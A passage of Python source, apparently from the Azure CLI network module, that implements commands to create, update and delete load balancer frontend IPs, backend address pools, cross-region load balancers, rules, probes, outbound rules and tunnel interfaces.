ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if private_ip_address_allocation is None:
private_ip_address_allocation = 'static' if private_ip_address else 'dynamic'
new_config = FrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address,
private_ip_address_version=private_ip_address_version,
private_ip_allocation_method=private_ip_address_allocation,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None,
subnet=Subnet(id=subnet) if subnet else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def update_lb_frontend_ip_configuration_setter(cmd, resource_group_name, load_balancer_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).load_balancers
return client.begin_create_or_update(resource_group_name, load_balancer_name, parameters)
def set_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, private_ip_address=None,
private_ip_address_allocation=None, public_ip_address=None,
subnet=None, virtual_network_name=None, public_ip_prefix=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if not private_ip_address:
instance.private_ip_allocation_method = 'dynamic'
instance.private_ip_address = None
elif private_ip_address is not None:
instance.private_ip_allocation_method = 'static'
instance.private_ip_address = private_ip_address
# Doesn't support update operation for now
# if cmd.supported_api_version(min_api='2019-04-01'):
# instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _process_vnet_name_and_id(vnet, cmd, resource_group_name):
if vnet and not is_valid_resource_id(vnet):
vnet = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet)
return vnet
def _process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name):
if subnet and not is_valid_resource_id(subnet):
vnet = _process_vnet_name_and_id(vnet, cmd, resource_group_name)
if vnet is None:
raise UnrecognizedArgumentError('vnet should be provided when input subnet name instead of subnet id')
subnet = vnet + f'/subnets/{subnet}'
return subnet
# pylint: disable=too-many-branches
def create_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
vnet=None, backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
(BackendAddressPool,
LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
# Before 2020-03-01, service doesn't support the other rest method.
# We have to use old one to keep backward compatibility.
# Same for basic sku. service refuses that basic sku lb call the other rest method.
if cmd.supported_api_version(max_api='2020-03-01') or lb.sku.name.lower() == 'basic':
new_pool = BackendAddressPool(name=backend_address_pool_name)
upsert_to_collection(lb, 'backend_address_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().backend_address_pools, backend_address_pool_name)
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
# when sku is 'gateway', 'tunnelInterfaces' can't be None. Otherwise service will response error
if cmd.supported_api_version(min_api='2021-02-01') and lb.sku.name.lower() == 'gateway':
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
new_pool.tunnel_interfaces = [
GatewayLoadBalancerTunnelInterface(type='Internal', protocol='VXLAN', identifier=900)]
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def set_lb_backend_address_pool(cmd, instance, resource_group_name, vnet=None, backend_addresses=None,
backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
if new_addresses:
instance.load_balancer_backend_addresses = new_addresses
return instance
def delete_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name):
from azure.cli.core.commands import LongRunningOperation
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
def delete_basic_lb_backend_address_pool():
new_be_pools = [pool for pool in lb.backend_address_pools
if pool.name.lower() != backend_address_pool_name.lower()]
lb.backend_address_pools = new_be_pools
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
result = LongRunningOperation(cmd.cli_ctx)(poller).backend_address_pools
if next((x for x in result if x.name.lower() == backend_address_pool_name.lower()), None):
raise CLIError("Failed to delete '{}' on '{}'".format(backend_address_pool_name, load_balancer_name))
if lb.sku.name.lower() == 'basic':
delete_basic_lb_backend_address_pool()
return None
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
# region cross-region lb
def create_cross_region_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
public_ip_address=None, public_ip_address_allocation=None,
public_ip_dns_name=None, public_ip_address_type=None, validate=False,
no_wait=False, frontend_ip_zone=None, public_ip_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
sku = 'standard'
tier = 'Global'
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, tier))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, None, None, None, sku, frontend_ip_zone, None, tier)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_cross_region_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, zone=None):
FrontendIPConfiguration, SubResource = cmd.get_models(
'FrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_config = FrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def set_cross_region_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, public_ip_address=None, public_ip_prefix=None):
PublicIPAddress, SubResource = cmd.get_models('PublicIPAddress', 'SubResource')
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return parent
def create_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
(BackendAddressPool,
LoadBalancerBackendAddress,
FrontendIPConfiguration) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'FrontendIPConfiguration')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
# pylint: disable=line-too-long
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=addr['frontend_ip_address'])) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise CLIError('Each backend address must have name and frontend_ip_configuration information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def delete_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name): # pylint: disable=line-too-long
ncf = network_client_factory(cmd.cli_ctx)
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
def add_cross_region_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name, frontend_ip_address):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
# pylint: disable=line-too-long
(LoadBalancerBackendAddress, FrontendIPConfiguration) = cmd.get_models('LoadBalancerBackendAddress', 'FrontendIPConfiguration')
new_address = LoadBalancerBackendAddress(name=address_name,
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=frontend_ip_address) if frontend_ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def create_cross_region_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, i) for i in backend_pools_name]
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_cross_region_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
# To keep compatible when bump version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
# endregion
# pylint: disable=line-too-long
def add_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
address_name, ip_address, vnet=None, subnet=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
if cmd.supported_api_version(min_api='2020-11-01'):
if vnet:
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=_process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name)) if subnet else None,
virtual_network=VirtualNetwork(id=vnet),
ip_address=ip_address if ip_address else None)
elif is_valid_resource_id(subnet):
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=subnet),
ip_address=ip_address if ip_address else None)
else:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet name | subnet id) information.')
else:
new_address = LoadBalancerBackendAddress(name=address_name,
virtual_network=VirtualNetwork(id=vnet) if vnet else None,
ip_address=ip_address if ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
lb_addresses = [addr for addr in address_pool.load_balancer_backend_addresses if addr.name != address_name]
address_pool.load_balancer_backend_addresses = lb_addresses
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.load_balancer_backend_addresses
def create_lb_outbound_rule(cmd, resource_group_name, load_balancer_name, item_name,
backend_address_pool, frontend_ip_configurations, protocol,
outbound_ports=None, enable_tcp_reset=None, idle_timeout=None):
OutboundRule, SubResource = cmd.get_models('OutboundRule', 'SubResource')
client = network_client_factory(cmd.cli_ctx).load_balancers
lb = lb_get(client, resource_group_name, load_balancer_name)
rule = OutboundRule(
protocol=protocol, enable_tcp_reset=enable_tcp_reset, idle_timeout_in_minutes=idle_timeout,
backend_address_pool=SubResource(id=backend_address_pool),
frontend_ip_configurations=[SubResource(id=x) for x in frontend_ip_configurations]
if frontend_ip_configurations else None,
allocated_outbound_ports=outbound_ports, name=item_name)
upsert_to_collection(lb, 'outbound_rules', rule, 'name')
poller = client.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().outbound_rules, item_name)
def set_lb_outbound_rule(instance, cmd, parent, item_name, protocol=None, outbound_ports=None,
idle_timeout=None, frontend_ip_configurations=None, enable_tcp_reset=None,
backend_address_pool=None):
SubResource = cmd.get_models('SubResource')
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('allocated_outbound_ports', outbound_ports)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('backend_address_pool', SubResource(id=backend_address_pool)
if backend_address_pool else None)
c.set_param('frontend_ip_configurations',
[SubResource(id=x) for x in frontend_ip_configurations] if frontend_ip_configurations else None)
return parent
def create_lb_probe(cmd, resource_group_name, load_balancer_name, item_name, protocol, port,
path=None, interval=None, threshold=None):
Probe = cmd.get_models('Probe')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_probe = Probe(
protocol=protocol, port=port, interval_in_seconds=interval, number_of_probes=threshold,
request_path=path, name=item_name)
upsert_to_collection(lb, 'probes', new_probe, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().probes, item_name)
def set_lb_probe(cmd, instance, parent, item_name, protocol=None, port=None,
path=None, interval=None, threshold=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('port', port)
c.set_param('request_path', path)
c.set_param('interval_in_seconds', interval)
c.set_param('number_of_probes', threshold)
return parent
def create_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, disable_outbound_snat=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
# avoid break when backend_address_pool_name is None and backend_pools_name is not None
if not backend_address_pool_name and backend_pools_name:
backend_address_pool_name = backend_pools_name[0]
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset,
disable_outbound_snat=disable_outbound_snat)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, name) for name in backend_pools_name]
# Otherwiase service will response error : (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
new_rule.backend_address_pool = None
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution='default', floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
disable_outbound_snat=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('disable_outbound_snat', disable_outbound_snat)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
# To keep compatible when bump version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
# Otherwiase service will response error : (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
instance.backend_address_pool = None
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
def add_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, protocol, identifier, traffic_type, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
tunnel_interface = GatewayLoadBalancerTunnelInterface(port=port, identifier=identifier, protocol=protocol, type=traffic_type)
if not address_pool.tunnel_interfaces:
address_pool.tunnel_interfaces = []
address_pool.tunnel_interfaces.append(tunnel_interface)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def update_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index, protocol=None, identifier=None, traffic_type=None, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
raise UnrecognizedArgumentError(f'{index} is out of scope, please input proper index')
item = address_pool.tunnel_interfaces[index]
if protocol:
item.protocol = protocol
if identifier:
item.identifier = identifier
if port:
item.port = port
if traffic_type:
item.type = traffic_type
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
raise UnrecognizedArgumentError(f'{index} is out of scope, please input proper index')
address_pool.tunnel_interfaces.pop(index)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.tunnel_interfaces
# endregion
# region LocalGateways
def _validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight):
if any([asn, bgp_peering_address, peer_weight]):
if instance.bgp_settings is not None:
# update existing parameters selectively
if asn is not None:
instance.bgp_settings.asn = asn
if peer_weight is not None:
instance.bgp_settings.peer_weight = peer_weight
if bgp_peering_address is not None:
instance.bgp_settings.bgp_peering_address = bgp_peering_address
elif asn:
BgpSettings = cmd.get_models('BgpSettings')
instance.bgp_settings = BgpSettings(asn, bgp_peering_address, peer_weight)
else:
raise CLIError(
'incorrect usage: --asn ASN [--peer-weight WEIGHT --bgp-peering-address IP]')
def create_local_gateway(cmd, resource_group_name, local_network_gateway_name, gateway_ip_address,
location=None, tags=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, no_wait=False):
AddressSpace, LocalNetworkGateway, BgpSettings = cmd.get_models(
'AddressSpace', 'LocalNetworkGateway', 'BgpSettings')
client = network_client_factory(cmd.cli_ctx).local_network_gateways
local_gateway = LocalNetworkGateway(
local_network_address_space=AddressSpace(address_prefixes=(local_address_prefix or [])),
